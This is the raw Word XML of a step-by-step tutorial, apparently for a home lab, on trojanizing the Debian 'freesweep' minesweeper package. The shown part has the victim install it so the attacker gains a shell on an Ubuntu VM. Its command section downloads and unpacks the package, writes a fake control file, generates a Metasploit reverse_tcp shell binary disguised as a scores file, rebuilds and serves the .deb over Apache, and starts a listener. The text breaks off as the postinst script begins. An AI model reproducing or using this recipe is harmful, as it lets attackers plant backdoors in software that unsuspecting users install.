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87DD" w14:textId="1BF3EA0C" w:rsidR="005B6241" w:rsidRPr="005B6241" w:rsidRDefault="005B6241">
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Gaining access to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE476A">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> system when user double clicks the payload/software created by us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44913FA8" w14:textId="77E4EA4B" w:rsidR="008D0F6B" w:rsidRPr="008D0F6B" w:rsidRDefault="005B6241">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6241">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BADBCB1" w14:textId="547D93A6" w:rsidR="008D0F6B" w:rsidRDefault="008D0F6B">
      <w:r>
        <w:t>Download and install VirtualBox (Straight forward will not be covered in the tutorial)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422C6CC6" w14:textId="37A0B788" w:rsidR="005B6241" w:rsidRDefault="005B6241">
      <w:r>
        <w:t>Download kali VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4845075B" w14:textId="0410DF08" w:rsidR="005B6241" w:rsidRDefault="005B6241">
      <w:r>
        <w:t>Load the download kali VM into VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648F7B2" w14:textId="7F5CC17A" w:rsidR="00974DA9" w:rsidRDefault="00974DA9">
      <w:r>
        <w:t>Download and install ubuntu as VM in VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4530461F" w14:textId="716159BB" w:rsidR="005B6241" w:rsidRDefault="00FE49F5">
      <w:r>
        <w:t>Create a payload in kali VM using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ADDFC4" w14:textId="2BACF061" w:rsidR="003558E6" w:rsidRDefault="00DE476A">
      <w:r>
        <w:t>Installing the payload by victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04687D6F" w14:textId="04F1EC26" w:rsidR="008D0F6B" w:rsidRDefault="008D0F6B">
      <w:r>
        <w:t>Gaining access to windows from kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0D0809" w14:textId="78237FFC" w:rsidR="00E069C9" w:rsidRPr="00E069C9" w:rsidRDefault="00E069C9">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E069C9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F2FD54" w14:textId="539B35B7" w:rsidR="00DF6798" w:rsidRDefault="00133777">
      <w:r>
        <w:t xml:space="preserve">Download kali VM from offensive security </w:t>
      </w:r>
      <w:r w:rsidR="008D0F6B">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="008D0F6B" w:rsidRPr="00281631">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>virtual box</w:t>
      </w:r>
      <w:r w:rsidR="008D0F6B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE4A101" w14:textId="10A73D64" w:rsidR="005B6241" w:rsidRDefault="00794503">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="005B6241" w:rsidRPr="000129D9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AEADF05" w14:textId="6FDB64B5" w:rsidR="00281631" w:rsidRDefault="002816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DB67" wp14:editId="79DEB53A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1733107</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>257042</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1509823" cy="297712"/>
                <wp:effectExtent l="0" t="0" r="1460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2E7ACE75" id="Rectangle 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:136.45pt;margin-top:20.25pt;width:118.9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3179B8" wp14:editId="677A2E1E">
            <wp:extent cx="594360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0A9" w14:textId="26F1AFA0" w:rsidR="00281631" w:rsidRPr="00B71187" w:rsidRDefault="00F76CE6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Downloaded file name </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71187">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00B71187" w:rsidRPr="00B71187">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>kali-linux-2018.3-vbox-amd64.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A3213E" w14:textId="50E5D791" w:rsidR="00B71187" w:rsidRDefault="00B71187">
      <w:r>
        <w:t>Extract the tar file</w:t>
      </w:r>
      <w:r w:rsidR="00236490">
        <w:t xml:space="preserve"> to a folder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00236490">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r>
        <w:t>WinRAR software, you might have to install it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABC5649" w14:textId="37C333E1" w:rsidR="0017724B" w:rsidRDefault="00236490">
      <w:r>
        <w:t>After extracting the tar file, you will see two files</w:t>
      </w:r>
      <w:r w:rsidR="00CA6461">
        <w:t xml:space="preserve">. One </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CA6461">
        <w:t>with .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6461">
        <w:t>ovf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CA6461">
        <w:t xml:space="preserve"> extension and other with .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6461">
        <w:t>vmdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6461">
        <w:t xml:space="preserve"> extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01711C8F" w14:textId="41F22A8D" w:rsidR="0017724B" w:rsidRDefault="00A75D44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025734AC" wp14:editId="6A32D7BA">
            <wp:extent cx="5943600" cy="1046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A1D3" w14:textId="77777777" w:rsidR="0017724B" w:rsidRDefault="0017724B"/>
    <w:p w14:paraId="24137C83" w14:textId="3B8AF3BB" w:rsidR="0017724B" w:rsidRDefault="0017724B"/>
    <w:p w14:paraId="5CB51BC2" w14:textId="77777777" w:rsidR="00A75D44" w:rsidRDefault="00A75D44"/>
    <w:p w14:paraId="1B3015E4" w14:textId="1A9C7C58" w:rsidR="00B71187" w:rsidRDefault="0017724B">
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> software and click on New Icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B281D" w14:textId="77777777" w:rsidR="00E03B9E" w:rsidRDefault="001772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FAD46" wp14:editId="2E6D10C6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>277362</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="223283" cy="265814"/>
                <wp:effectExtent l="0" t="0" r="2476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65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BED1E48" id="Rectangle 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:21.85pt;width:17.6pt;height:20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" filled="f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AD3A0E" wp14:editId="5A43E666">
            <wp:extent cx="4752340" cy="24348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37" b="21580"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4796689" cy="245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FCFF" w14:textId="77777777" w:rsidR="00E03B9E" w:rsidRDefault="00E03B9E"/>
    <w:p w14:paraId="191E1B55" w14:textId="5519123B" w:rsidR="00E25CBE" w:rsidRDefault="00E25CBE">
      <w:r>
        <w:t>Use the following configuration as shown in the below image</w:t>
      </w:r>
      <w:r w:rsidR="00CA6461">
        <w:t>. Click on the folder icon and navigate to your extracted .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6461">
        <w:t>vmdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6461">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
      <w:r w:rsidR="002A5857">
        <w:t xml:space="preserve">  Click on create button.</w:t>
      </w:r>
      <w:r w:rsidR="004A6DCD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D1CEB66" wp14:editId="2A21665D">
            <wp:extent cx="4592256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117" cy="41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69CD" w14:textId="1E69A6D4" w:rsidR="00E03B9E" w:rsidRDefault="00E03B9E"/>
    <w:p w14:paraId="5631E62F" w14:textId="74ACE86C" w:rsidR="00E03B9E" w:rsidRDefault="00F6760D">
      <w:r>
        <w:t>After creating a new VM profil</w:t>
      </w:r>
      <w:r w:rsidR="00D51DEF">
        <w:t>e, start the kali VM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D6229" w14:textId="2477653A" w:rsidR="00D05CEF" w:rsidRDefault="003D7E8D">
      <w:r>
        <w:t xml:space="preserve">Default username and password are root and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137317F2" w14:textId="416A6965" w:rsidR="00974DA9" w:rsidRDefault="00974DA9"/>
    <w:p w14:paraId="2A5A104C" w14:textId="1307C5D1" w:rsidR="00974DA9" w:rsidRDefault="00974DA9">
      <w:r>
        <w:t>Install ubuntu in virtual box</w:t>
      </w:r>
      <w:r w:rsidR="0035003D">
        <w:t>. The following tutorial explains the installing ubuntu in virtual box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3CA730" w14:textId="7DE132E2" w:rsidR="0035003D" w:rsidRDefault="009C0D89">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0081250E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.wikihow.com/Install-Ubuntu-on-VirtualBox</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F56A19C" w14:textId="436A03F5" w:rsidR="009C0D89" w:rsidRDefault="009C0D89"/>
    <w:p w14:paraId="5526B195" w14:textId="696D52BD" w:rsidR="009C0D89" w:rsidRDefault="00184625">
      <w:r>
        <w:t xml:space="preserve">After installing ubuntu make sure you have connectivity to kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (by using ping). If you don’t have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connectivity</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then </w:t>
      </w:r>
      <w:r w:rsidRPr="00184625">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>you have to setup NAT network</w:t>
      </w:r>
      <w:r>
        <w:t>. Follow the steps in the given link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C963F8D" w14:textId="3CF655E2" w:rsidR="00184625" w:rsidRDefault="00184625">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00184625">
        <w:instrText>https://dbvisit.atlassian.net/wiki/spaces/REPA12/pages/38141962/02+-+Set+up+NAT+network+in+Virtual+Box</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0081250E">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://dbvisit.atlassian.net/wiki/spaces/REPA12/pages/38141962/02+-+Set+up+NAT+network+in+Virtual+Box</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="111554DD" w14:textId="77777777" w:rsidR="00184625" w:rsidRDefault="00184625"/>
    <w:p w14:paraId="49FD709D" w14:textId="77777777" w:rsidR="00D736D7" w:rsidRDefault="00184625">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006507F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Creating</w:t>
      </w:r>
      <w:r w:rsidR="00427309" w:rsidRPr="006507F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> and publishing</w:t>
      </w:r>
      <w:r w:rsidRPr="006507F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload in </w:t>
      </w:r>
      <w:r w:rsidR="00D736D7" w:rsidRPr="006507F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3111C983" w14:textId="6D08B078" w:rsidR="00067914" w:rsidRDefault="00625A95">
      <w:r>
        <w:t xml:space="preserve">Type the following commands in given sequence. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC96C82" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt-get --download-only install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freesweep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D54AE23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</w:p>
    <w:p w14:paraId="44A958AB" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>mv /var/cache/apt/archives/freesweep_1.0.1-1_amd64.deb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</w:p>
    <w:p w14:paraId="2FBB7DCD" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>cd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  <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D5E79B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dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -x freesweep_1.0.1-1_amd64.deb work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1722FFC0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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> work/DEBIAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA2571" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>cd work/DEBIAN/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B3ED5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nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE668F7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nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postinst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5555A1AC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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a x86 --platform </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x86/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=10.0.2.5 LPORT=443 -b "\x00" -f elf -o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  <w:r>
        <w:t>/work/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/games/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freesweep_scores</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51282A6F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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 755 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postinst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CF0D432" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-deb --build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  <w:r>
        <w:t>/work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E093CE9" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137279B5" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mv </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">freesweep_1.0.1-1_amd64.deb  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freesweep.deb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="29B3DE09" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freesweep.deb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459CB78" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0166CF54" w14:textId="5B8B4FE2" w:rsidR="008F7261" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q -x "use exploit/multi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>handler;set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x86/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; set LHOST 10.0.2.5; set LPORT 443; run; exit -y"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A847CA1" w14:textId="77777777" w:rsidR="00106D19" w:rsidRPr="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15386444" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19"/>
    <w:p w14:paraId="5D2D599F" w14:textId="1682DF53" w:rsidR="00106D19" w:rsidRDefault="00EF123F">
      <w:r>
        <w:t>In ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ command in the above commands, there is field/ parameter ‘LHOST’. </w:t>
      </w:r>
      <w:r w:rsidR="00817381">
        <w:t xml:space="preserve">This parameter indicates the </w:t>
      </w:r>
      <w:r w:rsidR="00EF668E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00817381">
        <w:t xml:space="preserve"> address of </w:t>
      </w:r>
      <w:r w:rsidR="00F14CE5">
        <w:t>kali VM. You might have to change it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5732E947" w14:textId="77777777" w:rsidR="00A2538C" w:rsidRDefault="00A2538C"/>
    <w:p w14:paraId="36CC72C6" w14:textId="6C411E42" w:rsidR="008E5F4E" w:rsidRDefault="00E42CF6">
      <w:r>
        <w:t>Notice the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ commands in </w:t>
      </w:r>
      <w:r w:rsidR="00CA7073">
        <w:t>the above</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69702743" w14:textId="2F177C12" w:rsidR="005C2C81" w:rsidRDefault="00E42CF6">
      <w:r>
        <w:t xml:space="preserve">In the first </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command type</w:t>
      </w:r>
      <w:r w:rsidR="005C2C81">
        <w:t>/ paste the following</w:t>
      </w:r>
      <w:r w:rsidR="008F7261">
        <w:t xml:space="preserve"> text and save</w:t>
      </w:r>
      <w:r w:rsidR="00497BDE">
        <w:t xml:space="preserve"> (ctrl + x)</w:t>
      </w:r>
      <w:r w:rsidR="00354FBF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF7F3C9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Package: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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freesweep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C505E22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Version: 0.90-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0237F85A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Section: Games and Amusement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383F3870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Priority: optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C64ECD1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Architecture: i386</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DDED62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Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8B253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Description: a text-based minesweeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0DFF62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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Freesweep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 is an implementation of the popular minesweeper game, where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B154A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 one tries to find all the mines without igniting any, based on hints given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C84B0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 by the computer. Unlike most implementations of this game, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Freesweep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70BB0E61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 works in any visual text display - in Linux console, in an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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xterm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>, and in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53239327" w14:textId="77777777" w:rsidR="005C2C81" w:rsidRPr="005C2C81" w:rsidRDefault="005C2C81" w:rsidP="00106D19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C2C81">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="DDDDDD"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> most text-based terminals currently in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094782FA" w14:textId="16D11903" w:rsidR="005C2C81" w:rsidRDefault="005C2C81"/>
    <w:p w14:paraId="6EB93365" w14:textId="08AF51A2" w:rsidR="005C2C81" w:rsidRDefault="005C2C81">
      <w:r>
        <w:t xml:space="preserve">In the second </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command type/paste the following</w:t>
      </w:r>
      <w:r w:rsidR="00EF5D03">
        <w:t xml:space="preserve"> text and save</w:t>
      </w:r>
      <w:r w:rsidR="00497BDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497BDE">
        <w:t>(ctrl + x)</w:t>
      </w:r>
      <w:r w:rsidR="00354FBF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A61A03" w14:textId="77777777" w:rsidR="00106D19" w:rsidRDefault="00106D19" w:rsidP="00106D19">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
